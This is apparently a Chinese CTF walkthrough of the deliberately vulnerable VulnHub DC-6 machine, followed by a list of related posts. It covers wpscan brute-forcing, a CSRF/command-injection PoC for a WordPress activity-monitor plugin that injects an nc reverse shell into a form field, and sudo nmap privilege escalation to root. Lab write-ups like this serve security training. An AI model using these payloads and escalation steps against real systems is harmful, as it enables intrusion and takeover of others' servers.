VulnHub通关日记-DC_6-Walkthrough

简介: 好的,这并不是一个真正的线索,但是对于那些只是想继续工作的人,更多的是“我们不想花五年时间等待某个过程完成”的建议。

VulnHub通关日记-DC_6-Walkthrough

靶机介绍

好的,这并不是一个真正的线索,但是对于那些只是想继续工作的人,更多的是“我们不想花五年时间等待某个过程完成”的建议。


cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

那应该节省您几年。;-)

运用的知识

wpsacn爆破网站用户密码 wordpress后台Activity monitor插件命令注入获取shellnmap提权获取root

信息搜集

拿到IP后对它进行扫描端口开放服务:


nmap -A -T4 192.168.1.145


nmap扫描


扫描出来后发现它开放了80(http),22(ssh),紧接着访问http://192.168.1.145 发现它重定向到了这个URL:wordy


扫描结果


然后我设置了一下hosts文件:


设置主机文件


设置好之后打开http://wordy 发现它的CMS是Wordpress


判断cms


wpscan爆破网站用户密码

的英文既然wordpress那么我就先用wpscan来对它进行扫描把:


wpscan --url http://wordy/ -e u


wpscan爆破


扫描出来后发现它有这些用户:



adminjensgrahammarksarah

紧接着我又生成了一些字典文件来对它网站进行爆破:



cat /usr/share/wordlists/rockyou.txt | grep k01# 这是作者给我们的提示!

生成完字典后对它的网站用户名挨个爆破枚举,看看能不能捡漏:


wpscan --url http://wordy/ -U user -P passwords.txt


用户名枚举


爆破成功后得到mark的密码:


Username: mark, Password: helpdesk01

随后我用得到的账号和密码登陆到了网站的后台发现了一个插件:Activity monitor


发现插件活动监视器


活动监视器插件命令注入获取shell

看到这个插件我去搜索了一下发现有一个命令注入


命令注入



PoC:
-->
<html>
  <!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc 192.168.1.128 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


插入有效载荷


设置好之后KALI用nc监听6666端口,访问得到poc.html一枚shell


访问



GetShell


先让他得到一个bash外壳把:


python -c 'import pty;pty.spawn("/bin/bash")'


python的bash外壳


通过信息搜集我发现mark目录下有一个文件,里面预定了graham的密码:




Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)- Buy present for Sarah's farewell party- Add new user: graham - GSo7isUM1D4 - done- Apply for the OSCP course- Buy new laptop for Sarah's replacement


graham密码


拿到密码后我ssh登陆到了graham


登录graham


sudo切换到jens用户

登陆成功后我习惯性的sudo -l发现graham用户可以以jens的身份去运行/home/jens/backups.sh文件:

查看backups.sh文件后发现它是一个解压的命令,然后我以jens身份去运行这个文件成功切换到了jens


sudo -u jens /home/jens/backups.sh


切换到jens用户


nmap提权

成功来到jens用户后我又是习惯性的sudo -l发现它可以以root身份去运行/usr/bin/nmap


nmap提权1


最后也是用nmap提权为root用户:




TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TF


nmap提权2

最终也是在/root目录下拿到了Flag

相关文章
|
SQL 安全 网络协议
VulnHub通关日记-DC_9-Walkthrough
DC-9是 DC 系列的最后一个靶机了,这项挑战的最终目标是扎根并读取唯一的标志。
|
SQL 安全 Shell
VulnHub通关日记-DC_7-Walkthrough
DC-7是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
|
安全 Shell C语言
VulnHub通关日记-DC_5-Walkthrough
LFI(本地文件包含)日志获取shell wfuzz工具的使用 screen提权root
|
SQL Shell 网络安全
VulnHub通关日记-DC_4-Walkthrough
DC-4是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
|
Shell Linux 网络安全
VulnHub通关日记-DC_2-Walkthrough
总共有5个Flag,最后一个Flag是在 root 目录下!
|
SQL 安全 关系型数据库
VulnHub通关日记-DC_1-Walkthrough
DC系列的靶机是一个专门构建的易受攻击的实验室,总共有九个!目的是获得渗透测试领域的经验
|
5月前
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
BOSHIDA DC/AC电源模块的节能特点与环保优势
|
5月前
|
安全
DC/AC电源模块为现代电子设备提供稳定的能源
DC/AC电源模块为现代电子设备提供稳定的能源
 DC/AC电源模块为现代电子设备提供稳定的能源
|
5月前
|
安全
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
DC/AC电源模块:让电力转换变得更简单
|
3月前
|
芯片 网络架构
开关电源DC-DC电源应用
DC-DC指直流转直流电源(Direct Current)。是一种在直流电路中将一个电压值的电能变为另一个电压值的电能的装置。如,通过一个转换器能将一个直流电压(5.0V)转换成其他的直流电压(1.5V或12.0V),我们称这个转换器为DC-DC转换器,或称之为开关电源或开关调整器。 DC-DC转换器一般由控制芯片,电感线圈,二极管,三极管,电容器构成。在讨论DC-DC转换器的性能时,如果单针对控制芯片,是不能判断其优劣的。其外围电路的元器件特性,和基板的布线方式等,能改变电源电路的性能,因此,应进行综合判断。 DC-DC转换器的使用有利于简化电源电路设计,缩短研制周期,实现最佳指标等,被